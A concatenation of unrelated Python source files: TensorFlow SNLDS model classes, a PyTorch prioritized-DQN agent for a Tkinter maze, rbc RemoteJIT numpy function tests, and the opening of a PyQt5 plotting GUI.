raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="ContinuousStateTransition"):
"""Construct a `ContinuousStateTransition` instance.
Args:
transition_mean_networks: a list of `callable` networks, with the length
of list same as `num_categories`. Each one of the networks will take
previous step hidden state, `z[t-1]`, and returns the mean of
transition distribution, `p(z[t] | z[t-1], s[t]=i)` for each
discrete state `i`.
distribution_dim: an `int` scalar for dimension of continuous hidden
states, `z`.
num_categories: an `int` scalar for number of discrete states, `s`.
cov_mat: an optional `float` Tensor for predefined covariance matrix.
Default to `None`, in which case, a `cov` variable will be created.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrices and
`tfp.distributions.MultivariateNormalDiag` will be used.
use_trainable_cov: a `bool` scalar indicating whether the scale of
the distribution is trainable. Default to False.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min))`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
"""
super(ContinuousStateTransition, self).__init__()
assertion_str = (
"There has to be one transition mean networks for each discrete state")
assert len(transition_mean_networks) == num_categories, assertion_str
self.z_trans_networks = transition_mean_networks
self.num_categ = num_categories
self.use_triangular_cov = use_triangular_cov
self.distribution_dim = distribution_dim
if cov_mat:
self.cov_mat = cov_mat
elif self.use_triangular_cov:
self.cov_mat = tfp.math.fill_triangular(
tf.Variable(
tf.random.uniform(
shape=[
int(self.distribution_dim
* (self.distribution_dim + 1) / 2)],
minval=0., maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov))
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
else:
self.cov_mat = tf.Variable(
tf.random.uniform(shape=[self.distribution_dim],
minval=0.0, maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
batch_size, num_steps, distribution_dim = tf.unstack(tf.shape(input_tensor))
# The shape of the mean_tensor after tf.stack is [num_categ, batch_size,
# num_steps, distribution_dim].,
mean_tensor = tf.transpose(
tf.stack([
z_net(input_tensor) for z_net in self.z_trans_networks]),
[1, 2, 0, 3])
mean_tensor = tf.reshape(mean_tensor,
[batch_size, num_steps,
self.num_categ, distribution_dim])
if self.use_triangular_cov:
output_dist = tfd.MultivariateNormalTriL(
loc=mean_tensor,
scale_tril=self.cov_mat)
else:
output_dist = tfd.MultivariateNormalDiag(
loc=mean_tensor,
scale_diag=self.cov_mat)
return tfp.experimental.as_composite(output_dist)
@property
def output_event_dims(self):
return self.distribution_dim
class DiscreteStateTransition(tf.keras.Model):
"""Discrete state transition p(s[t] | s[t-1], x[t-1])."""
def __init__(self,
transition_network,
num_categories):
"""Construct a `DiscreteStateTransition` instance.
Args:
transition_network: a `callable` network taking batch conditional inputs,
`x[t-1]`, and returning the discrete state transition matrices,
`log p(s[t] |s[t-1], x[t-1])`.
num_categories: an `int` scalar for number of discrete states, `s`.
"""
super(DiscreteStateTransition, self).__init__()
self.dense_net = transition_network
self.num_categ = num_categories
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
batch_size, num_steps = tf.unstack(tf.shape(input_tensor)[:2])
transition_tensor = self.dense_net(input_tensor)
transition_tensor = tf.reshape(
transition_tensor,
[batch_size, num_steps, self.num_categ, self.num_categ])
return transition_tensor
@property
def output_event_dims(self):
return self.num_categ
class GaussianDistributionFromMean(tf.keras.Model):
"""Emission model p(x[t] | z[t])."""
def __init__(self,
emission_mean_network,
observation_dim,
cov_mat=None,
use_triangular_cov=False,
use_trainable_cov=True,
raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="GaussianDistributionFromMean"):
"""Construct a `GaussianDistributionFromMean` instance.
Args:
emission_mean_network: a `callable` network taking continuous hidden
states, `z[t]`, and returning the mean of emission distribution,
`p(x[t] | z[t])`.
observation_dim: an `int` scalar for dimension of observations, `x`.
cov_mat: an optional `float` Tensor for predefined covariance matrix.
Default to `None`, in which case, a `cov` variable will be created.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrices and
`tfp.distributions.MultivariateNormalDiag` will be used.
use_trainable_cov: a `bool` scalar indicating whether the scale of
the distribution is trainable. Default to False.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min))`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
"""
super(GaussianDistributionFromMean, self).__init__()
self.observation_dim = observation_dim
self.x_emission_net = emission_mean_network
self.use_triangular_cov = use_triangular_cov
if cov_mat:
self.cov_mat = cov_mat
elif self.use_triangular_cov:
local_variable = tf.Variable(
tf.random.uniform(
shape=[int(self.observation_dim*(self.observation_dim+1)/2)],
minval=0., maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tfp.math.fill_triangular(
local_variable)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
else:
self.cov_mat = tf.Variable(
initial_value=tf.random.uniform(shape=[self.observation_dim],
minval=0.0, maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
mean_tensor = self.x_emission_net(input_tensor)
if self.use_triangular_cov:
output_dist = tfd.MultivariateNormalTriL(
loc=mean_tensor,
scale_tril=self.cov_mat)
else:
output_dist = tfd.MultivariateNormalDiag(
loc=mean_tensor,
scale_diag=self.cov_mat)
return tfp.experimental.as_composite(output_dist)
@property
def output_event_dims(self):
return self.observation_dim
class RnnInferenceNetwork(tf.keras.Model):
"""Inference network for posterior q(z[1:T] | x[1:T])."""
def __init__(self,
posterior_rnn,
posterior_dist,
latent_dim,
embedding_network=None):
"""Construct a `RnnInferenceNetwork` instance.
Args:
posterior_rnn: a RNN cell, `h[t]=f_RNN(h[t-1], z[t-1], input[t])`,
which recursively takes previous step RNN states `h`, previous step
sampled dynamical state `z[t-1]`, and conditioned input `input[t]`.
posterior_dist: a distribution instance for `p(z[t] | h[t])`,
where h[t] is the output of `posterior_rnn`.
latent_dim: an `int` scalar for dimension of continuous hidden
states, `z`.
embedding_network: an optional network to embed the observations, `x[t]`.
Default to `None`, in which case, no embedding is applied.
"""
super(RnnInferenceNetwork, self).__init__()
self.latent_dim = latent_dim
self.posterior_rnn = posterior_rnn
self.posterior_dist = posterior_dist
if embedding_network is None:
self.embedding_network = lambda x: x
self.embedding_network = embedding_network
def call(self,
inputs,
num_samples=1,
dtype=tf.float32,
random_seed=RANDOM_SEED,
parallel_iterations=10):
"""Recursively sample z[t] ~ q(z[t]|h[t]=f_RNN(h[t-1], z[t-1], h[t]^b)).
Args:
inputs: a float `Tensor` of size [batch_size, num_steps, obs_dim], where
each observation should be flattened.
num_samples: an `int` scalar for number of samples per time-step, for
posterior inference networks, `z[i] ~ q(z[1:T] | x[1:T])`.
dtype: The data type of input data.
random_seed: an `Int` as the seed for random number generator.
parallel_iterations: a positive `Int` indicates the number of iterations
allowed to run in parallel in `tf.while_loop`, where `tf.while_loop`
defaults it to be 10.
Returns:
sampled_z: a float 3-D `Tensor` of size [num_samples, batch_size,
num_steps, latent_dim], which stores the z_t sampled from posterior.
entropies: a float 2-D `Tensor` of size [num_samples, batch_size,
num_steps], which stores the entropies of posterior distributions.
log_probs: a float 2-D `Tensor` of size [num_samples. batch_size,
num_steps], which stores the log posterior probabilities.
"""
inputs = tf.convert_to_tensor(inputs, dtype_hint=dtype)
batch_size, num_steps = tf.unstack(tf.shape(inputs)[:2])
latent_dim = self.latent_dim
## passing through embedding_network, e.g. bidirectional RNN
inputs = self.embedding_network(inputs)
## passing through forward RNN
ta_names = ["rnn_states", "latent_states", "entropies", "log_probs"]
tas = [tf.TensorArray(tf.float32, num_steps, name=n) for n in ta_names]
t0 = tf.constant(0, tf.int32)
loopstate = namedtuple("LoopState", "rnn_state latent_encoded")
initial_rnn_state = self.posterior_rnn.get_initial_state(
batch_size=batch_size * num_samples,
dtype=dtype)
if (isinstance(self.posterior_rnn, layers.GRUCell)
or isinstance(self.posterior_rnn, layers.SimpleRNNCell)):
initial_rnn_state = [initial_rnn_state]
init_state = (t0,
loopstate(
rnn_state=initial_rnn_state,
latent_encoded=tf.zeros(
[batch_size * num_samples, latent_dim],
dtype=tf.float32)), tas)
def _cond(t, *unused_args):
return t < num_steps
def _step(t, loop_state, tas):
"""One step in tf.while_loop."""
prev_latent_state = loop_state.latent_encoded
prev_rnn_state = loop_state.rnn_state
current_input = inputs[:, t, :]
# Duplicate current observation to sample multiple trajectories.
current_input = tf.tile(current_input, [num_samples, 1])
rnn_input = tf.concat([current_input, prev_latent_state],
axis=-1) # num_samples * BS, latent_dim+input_dim
rnn_out, rnn_state = self.posterior_rnn(
inputs=rnn_input,
states=prev_rnn_state)
dist = self.posterior_dist(rnn_out)
latent_state = dist.sample(seed=random_seed)
## rnn_state is a list of [batch_size, rnn_hidden_dim],
## after TA.stack(), the dimension will be
## [num_steps, 1 for GRU/2 for LSTM, batch, rnn_dim]
tas_updates = [rnn_state,
latent_state,
dist.entropy(),
dist.log_prob(latent_state)]
tas = utils.write_updates_to_tas(tas, t, tas_updates)
return (t+1,
loopstate(rnn_state=rnn_state,
latent_encoded=latent_state),
tas)
## end of _step function
_, _, tas_final = tf.while_loop(
_cond, _step, init_state, parallel_iterations=parallel_iterations)
sampled_z, entropies, log_probs = [
utils.tensor_for_ta(ta, swap_batch_time=True) for ta in tas_final[1:]
]
sampled_z = tf.reshape(sampled_z,
[num_samples, batch_size, num_steps, latent_dim])
entropies = tf.reshape(entropies, [num_samples, batch_size, num_steps])
log_probs = tf.reshape(log_probs, [num_samples, batch_size, num_steps])
return sampled_z, entropies, log_probs
def create_model(num_categ,
hidden_dim,
observation_dim,
config_emission,
config_inference,
config_z_initial,
config_z_transition,
network_emission,
network_input_embedding,
network_posterior_rnn,
network_s_transition,
networks_z_transition,
network_posterior_mlp=lambda x: x,
name="snlds"):
"""Construct SNLDS model.
Args:
num_categ: an `int` scalar for number of discrete states, `s`.
hidden_dim: an `int` scalar for dimension of continuous hidden states, `z`.
observation_dim: an `int` scalar for dimension of observations, `x`.
config_emission: a `dict` for configuring emission distribution,
`p(x[t] | z[t])`.
config_inference: a `dict` for configuring the posterior distribution,
`q(z[t]|h[t]=f_RNN(h[t-1], z[t-1], h[t]^b))`.
config_z_initial: a `dict` for configuring the initial distribution of
continuous hidden state, `p(z[0])`.
config_z_transition: a `dict` for configuring the transition distribution
`p(z[t] | z[t-1], s[t])`.
network_emission: a `callable` network taking continuous hidden
states, `z[t]`, and returning the mean of emission distribution,
`p(x[t] | z[t])`.
network_input_embedding: a `callable` network to embed the observations,
`x[t]`. E.g. a bidirectional RNN to embedding `x[1:T]`.
network_posterior_rnn: a RNN cell, `h[t]=f_RNN(h[t-1], z[t-1], input[t])`,
which recursively takes previous step RNN states `h`, previous step
sampled dynamical state `z[t-1]`, and conditioned input `input[t]`.
network_s_transition: a `callable` network taking batch conditional inputs,
`x[t-1]`, and returning the discrete state transition matrices,
`log p(s[t] |s[t-1], x[t-1])`.
networks_z_transition: a list of `callable` networks, with the length
of list same as `num_categories`. Each one of the networks will take
previous step hidden state, `z[t-1]`, and returns the mean of
transition distribution, `p(z[t] | z[t-1], s[t]=i)` for each
discrete state `i`.
network_posterior_mlp: an optional network to embedding the output of
inference RNN networks, before passing into the distribution as mean,
`q(z[t] | mlp( h[t] ))`. Default to identity mapping.
name: a `str` to construct names of variables.
Returns:
An instance of instantiated `model_base.SwitchingNLDS` model.
"""
z_transition = ContinuousStateTransition(
transition_mean_networks=networks_z_transition,
distribution_dim=hidden_dim,
num_categories=num_categ,
cov_mat=config_z_transition.cov_mat,
use_triangular_cov=config_z_transition.use_triangular_cov,
use_trainable_cov=config_z_transition.use_trainable_cov,
raw_sigma_bias=config_z_transition.raw_sigma_bias,
sigma_min=config_z_transition.sigma_min,
sigma_scale=config_z_transition.sigma_scale,
name=name+"_z_trans")
s_transition = DiscreteStateTransition(
transition_network=network_s_transition,
num_categories=num_categ)
emission_network = GaussianDistributionFromMean(
emission_mean_network=network_emission,
observation_dim=observation_dim,
cov_mat=config_emission.cov_mat,
use_triangular_cov=config_emission.use_triangular_cov,
use_trainable_cov=config_emission.use_trainable_cov,
raw_sigma_bias=config_emission.raw_sigma_bias,
sigma_min=config_emission.sigma_min,
sigma_scale=config_emission.sigma_scale,
name=name+"_x_emit")
posterior_distribution = GaussianDistributionFromMean(
emission_mean_network=network_posterior_mlp,
observation_dim=hidden_dim,
cov_mat=config_inference.cov_mat,
use_triangular_cov=config_inference.use_triangular_cov,
use_trainable_cov=config_inference.use_trainable_cov,
raw_sigma_bias=config_inference.raw_sigma_bias,
sigma_min=config_inference.sigma_min,
sigma_scale=config_inference.sigma_scale,
name=name+"_posterior")
posterior_network = RnnInferenceNetwork(
posterior_rnn=network_posterior_rnn,
posterior_dist=posterior_distribution,
latent_dim=hidden_dim,
embedding_network=network_input_embedding)
z_initial_distribution = construct_initial_state_distribution(
latent_dim=hidden_dim,
num_categ=num_categ,
use_trainable_cov=config_z_initial.use_trainable_cov,
use_triangular_cov=config_z_initial.use_triangular_cov,
raw_sigma_bias=config_z_initial.raw_sigma_bias,
sigma_min=config_z_initial.sigma_min,
sigma_scale=config_z_initial.sigma_scale,
name="init_dist")
snlds_model = model_base.SwitchingNLDS(
continuous_transition_network=z_transition,
discrete_transition_network=s_transition,
emission_network=emission_network,
inference_network=posterior_network,
initial_distribution=z_initial_distribution,
continuous_state_dim=None,
num_categories=None,
discrete_state_prior=None)
return snlds_model
|
<reponame>GodWriter/RL-Pytorch
import math
import time
import argparse
import numpy as np
import tkinter as tk
import torch
import torch.nn as nn
from tensorboardX import SummaryWriter
seed = 1
torch.manual_seed(seed)
UNIT = 40 # 像素单位长度
MAZE_H = 4 # 高度
MAZE_W = 4 # 宽度
class Maze(tk.Tk, object):
def __init__(self):
super(Maze, self).__init__()
self.action_space = ['u', 'd', 'l', 'r']
self.n_actions = len(self.action_space)
self.title('maze')
self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))
self._build_maze()
def _build_maze(self):
self.canvas = tk.Canvas(self, bg='white',
height=MAZE_H * UNIT,
width=MAZE_W * UNIT)
# 创建格子
for c in range(0, MAZE_W * UNIT, UNIT):
x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT
self.canvas.create_line(x0, y0, x1, y1)
for r in range(0, MAZE_H * UNIT, UNIT):
x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r
self.canvas.create_line(x0, y0, x1, y1)
# 创建 origin
origin = np.array([20, 20])
# hell1
hell1_center = origin + np.array([UNIT * 2, UNIT])
self.hell1 = self.canvas.create_rectangle(hell1_center[0] - 15,
hell1_center[1] - 15,
hell1_center[0] + 15,
hell1_center[1] + 15,
fill='black')
# hell2
hell2_center = origin + np.array([UNIT, UNIT * 2])
self.hell2 = self.canvas.create_rectangle(hell2_center[0] - 15,
hell2_center[1] - 15,
hell2_center[0] + 15,
hell2_center[1] + 15,
fill='black')
# create oval
oval_center = origin + UNIT * 2
self.oval = self.canvas.create_oval(oval_center[0] - 15,
oval_center[1] - 15,
oval_center[0] + 15,
oval_center[1] + 15,
fill='yellow')
# create red rect
self.rect = self.canvas.create_rectangle(origin[0] - 15,
origin[1] - 15,
origin[0] + 15,
origin[1] + 15,
fill='red')
# pack all
self.canvas.pack()
def reset(self):
self.update()
time.sleep(0.5)
self.canvas.delete(self.rect)
origin = np.array([20, 20])
self.rect = self.canvas.create_rectangle(origin[0] - 15,
origin[1] - 15,
origin[0] + 15,
origin[1] + 15,
fill='red')
return self.canvas.coords(self.rect)
def step(self, action):
s = self.canvas.coords(self.rect) # 返回的是中心点坐标,所以下面比较的都是中心点的位置
base_action = np.array([0, 0])
if action == 0: # up
if s[1] > UNIT:
base_action[1] -= UNIT
elif action == 1: # down
if s[1] < (MAZE_H - 1) * UNIT:
base_action[1] += UNIT
elif action == 2: # right
if s[0] < (MAZE_W - 1) * UNIT:
base_action[0] += UNIT
elif action == 3:
if s[0] > UNIT:
base_action[0] -= UNIT
self.canvas.move(self.rect, base_action[0], base_action[1]) # 移动智能体
s_ = self.canvas.coords(self.rect) # 得到下一状态
# reward function
if s_ == self.canvas.coords(self.oval): # 走出迷宫
reward = 1
done = True
elif s_ in [self.canvas.coords(self.hell1), self.canvas.coords(self.hell2)]: # 走入陷阱
reward = -1
done = True
else: # 其他位置
reward = 0
done = False
return s_, reward, done
def render(self):
time.sleep(0.1)
self.update()
# Environment Config
env = Maze()
num_state = 4
num_action = env.n_actions
# CUDA
device = 'cpu' if not torch.cuda.is_available() else 'cuda:0'
device = torch.device(device)
class NaivePrioritizedBuffer(object):
def __init__(self, capacity, prob_alpha=0.6):
self.capacity = capacity
self.prob_alpha = prob_alpha
self.pos = 0
self.buffer = []
self.priorities = np.zeros((capacity,), dtype=np.float32)
def push(self, state, action, reward, next_state, done):
assert len(state) == len(next_state)
state = np.expand_dims(state, 0)
next_state = np.expand_dims(next_state, 0)
max_prio = self.priorities.max() if self.buffer else 1.0 # 初始的概率都是等高的,这个设置1,2,3都可以,相等即可
if len(self.buffer) < self.capacity:
self.buffer.append((state, action, reward, next_state, done))
else:
self.buffer[self.pos] = (state, action, reward, next_state, done)
self.priorities[self.pos] = max_prio # 令新样本优先级为当前最高,以保证每个样本至少被利用一次
self.pos = (self.pos + 1) % self.capacity
def sample(self, batch_size, beta=0.4):
if len(self.buffer) == self.capacity:
prios = self.priorities
else:
prios = self.priorities[:self.pos]
# 根据概率分布采样一个样本点
probs = prios ** self.prob_alpha
probs /= probs.sum()
indices = np.random.choice(len(self.buffer), batch_size, p=probs)
samples = [self.buffer[idx] for idx in indices]
# 计算样本点的重要性权重
total = len(self.buffer)
weights = (total * probs[indices]) ** (-beta)
weights /= weights.max()
weights = np.array(weights, dtype=np.float32)
batch = zip(*samples)
states = np.concatenate(batch[0])
actions = batch[1]
rewards = batch[2]
next_states = np.concatenate(batch[3])
dones = batch[4]
return states, actions, rewards, next_states, dones, indices, weights
def update_priorities(self, batch_indices, batch_priorities):
for idx, prio in zip(batch_indices, batch_priorities):
self.priorities[idx] = prio # TD偏差越大的,被采样到的概率越高
def __len__(self):
return len(self.buffer)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.layers = nn.Sequential(nn.Linear(num_state, 128),
nn.ReLU(),
nn.Linear(128, 128),
nn.ReLU(),
nn.Linear(128, num_action))
def forward(self, x):
return self.layers(x)
class PrioritizedDQN():
def __init__(self, args):
super(PrioritizedDQN, self).__init__()
self.args = args
self.target_net = Net().to(device)
self.eval_net = Net().to(device)
self.memory_count = 0
self.update_count = 0
self.replay_buffer = NaivePrioritizedBuffer(self.args.capacity)
self.writer = SummaryWriter(self.args.logs)
self.optimizer = torch.optim.Adam(self.eval_net.parameters(), self.args.learning_rate)
def choose_action(self, state, epsilon):
if np.random.rand(1) > epsilon:
state = torch.tensor(state, dtype=torch.float).unsqueeze(0).to(device)
value = self.eval_net(state)
_, idx = torch.max(value, 1)
action = idx.item()
else:
action = np.random.choice(range(num_action), 1).item()
return action
def learn(self, beta):
if self.memory_count >= self.args.capacity:
state, action, reward, next_state, done, indices, weights = self.replay_buffer.sample(self.args.batch_size, beta)
state = torch.FloatTensor(np.float32(state)).to(device)
next_state = torch.FloatTensor(np.float32(next_state)).to(device)
action = torch.LongTensor(action).to(device)
reward = torch.FloatTensor(reward).to(device)
done = torch.FloatTensor(done).to(device)
weights = torch.FloatTensor(weights).to(device)
eval_v = self.eval_net(state)
next_eval_v = self.eval_net(next_state)
target_v = self.target_net(next_state)
q_v = eval_v.gather(1, action.unsqueeze(1)).squeeze(1)
next_q_v = target_v.gather(1, torch.max(next_eval_v, 1)[1].unsqueeze(1)).squeeze(1)
expected_q_v = reward + self.args.gamma * next_q_v * (1 - done)
loss = (q_v - expected_q_v.detach()).pow(2) * weights
prios = loss + 1e-5
loss = loss.mean()
self.replay_buffer.update_priorities(indices, prios.detach().cpu().numpy()) # TD偏差用于更新样本的优先级
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.writer.add_scalar('loss/value_loss', loss, self.update_count)
self.update_count += 1
if self.update_count % 100 == 0:
self.target_net.load_state_dict(self.eval_net.state_dict())
def epsilon_by_frame(frame_idx):
epsilon_start = 1.0
epsilon_final = 0.01
epsilon_decay = 500
return epsilon_final + (epsilon_start - epsilon_final) * math.exp(-1. * frame_idx / epsilon_decay)
def beta_by_frame(frame_idx):
beta_start = 0.4
beta_frames = 1000
return min(1.0, beta_start + frame_idx * (1.0 - beta_start) / beta_frames)
def reward_func(env, x, theta):
r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.5
r2 = (env.theta_threshold_radians - abs(theta)) / env.theta_threshold_radians - 0.5
return r1 + r2 # 需自己定义reward,gym提供的会使得模型无法收敛
def main(args):
agent = PrioritizedDQN(args)
ep_reward = 0.0
state = env.reset()
if args.render: env.render()
for f_idx in range(args.n_frames):
# choose action and get next_state
epsilon = epsilon_by_frame(f_idx)
action = agent.choose_action(state, epsilon)
next_state, reward, done = env.step(action)
# update the replay buffer.
if args.render: env.render()
agent.replay_buffer.push(state, action, reward, next_state, done)
state = next_state
ep_reward += reward
if len(agent.replay_buffer) > args.batch_size:
beta = beta_by_frame(f_idx)
agent.learn(beta)
if f_idx % 200 == 0:
print("Frame is {}, the episode reward is {}".format(f_idx, round(ep_reward, 3)))
if done:
state = env.reset()
ep_reward = 0.0
print("Training is Done!!!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--n_frames', type=int, default=1000000)
parser.add_argument('--capacity', type=int, default=8000)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--learning_rate', type=float, default=1e-3)
parser.add_argument('--render', type=bool, default=True)
parser.add_argument('--logs', type=str, default='logs/Prioritized_DQN_CartPole_V0')
args = parser.parse_args()
print(args)
main(args)
|
<reponame>tupui/rbc
import atexit
import pytest
from rbc.remotejit import RemoteJIT
import numpy as np
@pytest.fixture(scope="module")
def rjit(request):
rjit = RemoteJIT()
rjit.start_server(background=True)
request.addfinalizer(rjit.stop_server)
atexit.register(rjit.stop_server)
return rjit
def test_trunc(rjit):
@rjit('double(double)')
def trunc(x):
return np.trunc(x)
assert (np.allclose(trunc(0.3), np.trunc(0.3)))
assert (np.allclose(trunc(2.9), np.trunc(2.0)))
def test_exp2(rjit):
@rjit('double(double)')
def exp2(x):
return np.exp2(x)
assert (np.isclose(exp2(2), np.exp2(2)))
assert (np.isclose(exp2(3), np.exp2(3)))
def test_exp2f(rjit):
@rjit('float(float)')
def exp2(x):
return np.exp2(x)
assert (np.isclose(exp2(2.0), np.exp2(2.0)))
def test_logaddexp(rjit):
# ref:
# https://github.com/numpy/numpy/blob/2fd9ff8277ad25aa386c3432b6ebc35322879d91/numpy/core/tests/test_umath.py#L818-L860
@rjit('double(double, double)')
def logaddexp(x, y):
return np.logaddexp(x, y)
def test_values():
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
logxf = np.log(np.array(_x, dtype=dt))
logyf = np.log(np.array(_y, dtype=dt))
logzf = np.log(np.array(_z, dtype=dt))
assert(np.allclose(logaddexp(logxf, logyf), logzf))
def test_range():
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp(xf, yf), zf))
def test_inf():
# logaddexp inf
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
with np.errstate(invalid='raise'):
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp(xf, yf), zf))
def test_nan():
assert(np.isnan(logaddexp(np.nan, np.inf)))
assert(np.isnan(logaddexp(np.inf, np.nan)))
assert(np.isnan(logaddexp(np.nan, 0)))
assert(np.isnan(logaddexp(0, np.nan)))
assert(np.isnan(logaddexp(np.nan, np.nan)))
test_values()
test_range()
test_inf()
test_nan()
def test_logaddexp2(rjit):
# ref:
# https://github.com/numpy/numpy/blob/2fd9ff8277ad25aa386c3432b6ebc35322879d91/numpy/core/tests/test_umath.py#L580-L619
@rjit('double(double, double)')
def logaddexp2(x, y):
return np.logaddexp2(x, y)
def test_values():
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
logxf = np.log2(np.array(_x, dtype=dt))
logyf = np.log2(np.array(_y, dtype=dt))
logzf = np.log2(np.array(_z, dtype=dt))
assert(np.allclose(logaddexp2(logxf, logyf), logzf))
def test_range():
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp2(xf, yf), zf))
def test_inf():
# logaddexp2 inf
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
with np.errstate(invalid='raise'):
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp2(xf, yf), zf))
def test_nan():
assert(np.isnan(logaddexp2(np.nan, np.inf)))
assert(np.isnan(logaddexp2(np.inf, np.nan)))
assert(np.isnan(logaddexp2(np.nan, 0)))
assert(np.isnan(logaddexp2(0, np.nan)))
assert(np.isnan(logaddexp2(np.nan, np.nan)))
test_values()
test_range()
test_inf()
test_nan()
def test_signbit(rjit):
@rjit('bool(double)')
def signbit(x):
return np.signbit(x)
def check(array):
for val in array:
out = signbit(val)
expected = np.signbit(val)
assert out == expected, val
a = np.arange(-10, 10, dtype=np.float32)
check(a)
b = np.array([-2, 5, 1, 4, 3], dtype=np.float16)
check(b)
c = np.array([-0.0, 0.0, np.inf, -np.inf], dtype=np.float32)
check(c)
|
import os
from PyQt5 import QtCore, QtWidgets
from .ui.MainWindow import Ui_MainWindow
from .ui.about import Ui_Form as Ui_aboutWindow
from .ui.input import Ui_Form as Ui_inputWindow
from .ui.help import Ui_Form as Ui_helpWindow
import pyqtgraph as pg
import pyqtgraph.exporters
import matplotlib.pyplot as plt
from .fit import *
import configparser
import sys
import matplotlib
matplotlib.use('Qt5Agg')
from PyQt5 import QtCore, QtGui, QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
try:
plt.rcParams.update({
"text.usetex": True,
"font.family": "DejaVu Sans",
"font.serif": ["Palatino"],
})
except:
print('Could not Latex-ify labels ')
class MplCanvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=4, dpi=300, show_residuals=True):
fig = Figure(figsize=(width, height), dpi=dpi, tight_layout=True)
if show_residuals:
self.axes = fig.add_subplot(211)
self.residuals = fig.add_subplot(212, sharex = self.axes)
else:
self.axes = fig.add_subplot(111)
super(MplCanvas, self).__init__(fig)
language_path = os.path.realpath(__file__)[:-6] + "language" + os.sep
class Mainwindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None, rawVariables=None):
